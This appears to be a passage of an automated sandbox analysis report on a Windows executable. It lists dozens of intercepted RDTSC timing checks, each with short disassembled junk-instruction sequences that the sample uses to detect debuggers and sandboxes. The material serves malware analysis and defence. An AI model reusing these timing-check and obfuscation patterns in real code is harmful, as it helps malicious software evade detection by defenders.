Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4637C second address: A4638B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnc 00007FE100E17066h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A47205 second address: A4720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D3F3 second address: A4D408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE100E1706Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D408 second address: A4D40C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BDC8 second address: A4BDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE100E1706Eh 0x0000000c jnp 00007FE100E17066h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BDE3 second address: A4BDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C0B2 second address: A4C0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C20D second address: A4C239 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE1010EA78Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1010EA794h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C239 second address: A4C23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C23D second address: A4C26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 jnp 00007FE1010EA786h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE1010EA790h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4C940 second address: A4C96A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E1706Ch 0x00000008 jo 00007FE100E17080h 0x0000000e jmp 00007FE100E17074h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CC3B second address: A4CC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CDBE second address: A4CDE8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007FE100E17066h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FE100E1706Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4CDE8 second address: A4CDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D265 second address: A4D26F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE100E17066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D26F second address: A4D2A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE1010EA788h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 js 00007FE1010EA7ADh 0x00000018 push edi 0x00000019 jmp 00007FE1010EA78Fh 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007FE1010EA786h 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4D2A6 second address: A4D2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A4BA7E second address: A4BA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A50C13 second address: A50C2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE100E1706Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A50C2A second address: A50C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A53869 second address: A5386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564CB second address: A564CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564CF second address: A564D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A564D5 second address: A564E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE1010EA792h 0x00000008 jnp 00007FE1010EA786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56624 second address: A56628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56628 second address: A5662E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5662E second address: A56644 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FE100E17066h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FE100E1707Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A56644 second address: A5664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9C01F0 second address: 9C01F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C30E second address: A5C312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C494 second address: A5C49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C49A second address: A5C4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5C8C9 second address: A5C8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A60099 second address: A6009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6009D second address: A600C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE100E17066h 0x00000008 jmp 00007FE100E17073h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FE100E1706Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5F94A second address: A5F94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5F94F second address: A5F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A5FAD3 second address: A5FAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6674B second address: A66755 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE100E17066h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A66755 second address: A66767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FE1010EA788h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A66767 second address: A6677F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17074h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A650E2 second address: A650E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6577E second address: A6579E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Dh 0x00000007 jmp 00007FE100E1706Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6646F second address: A6647C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFD0 second address: A6BFD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFD5 second address: A6BFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFDD second address: A6BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007FE100E1706Ah 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6BFF5 second address: A6C001 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C414 second address: A6C435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FE100E1707Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C983 second address: A6C989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C989 second address: A6C99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE100E17066h 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FE100E17066h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C99E second address: A6C9A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9A3 second address: A6C9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007FE100E170A5h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9B6 second address: A6C9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9BA second address: A6C9BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6C9BE second address: A6C9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE1010EA792h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF6D second address: A6CF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF71 second address: A6CF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF7F second address: A6CF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF83 second address: A6CF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF87 second address: A6CF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CF8F second address: A6CFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1010EA799h 0x00000008 jns 00007FE1010EA786h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFB3 second address: A6CFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007FE100E17066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFC5 second address: A6CFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA793h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FE1010EA786h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6CFE8 second address: A6D009 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE100E17066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FE100E17072h 0x00000012 jmp 00007FE100E1706Ch 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6D009 second address: A6D00F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6D2D2 second address: A6D315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FE100E1706Eh 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FE100E1706Ch 0x00000011 popad 0x00000012 jg 00007FE100E17076h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b je 00007FE100E1706Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6D315 second address: A6D31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6DC2A second address: A6DC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A6DC2E second address: A6DC4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FE1010EA786h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A71DCE second address: A71DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A72529 second address: A7253C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE1010EA78Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7253C second address: A72540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A72540 second address: A72571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE1010EA7A4h 0x0000000f jmp 00007FE1010EA798h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D46C second address: A7D472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D472 second address: A7D478 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D478 second address: A7D482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D482 second address: A7D488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D488 second address: A7D49A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D49A second address: A7D4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D7B3 second address: A7D7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 jne 00007FE100E17077h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D95D second address: A7D961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7D961 second address: A7D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE100E1706Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7DAB2 second address: A7DAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7DAB6 second address: A7DAD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE100E17066h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jbe 00007FE100E17066h 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7DAD3 second address: A7DADA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7DD4E second address: A7DD89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE100E17066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE100E17070h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FE100E1706Eh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d ja 00007FE100E1706Ah 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E02F second address: A7E047 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA78Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FE1010EA786h 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FE1010EA786h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E047 second address: A7E077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17070h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jnp 00007FE100E17066h 0x00000016 je 00007FE100E17066h 0x0000001c pop edi 0x0000001d jo 00007FE100E17072h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E077 second address: A7E07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E07D second address: A7E081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E1D7 second address: A7E21A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA796h 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007FE1010EA79Fh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: A7E978 second address: A7E97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
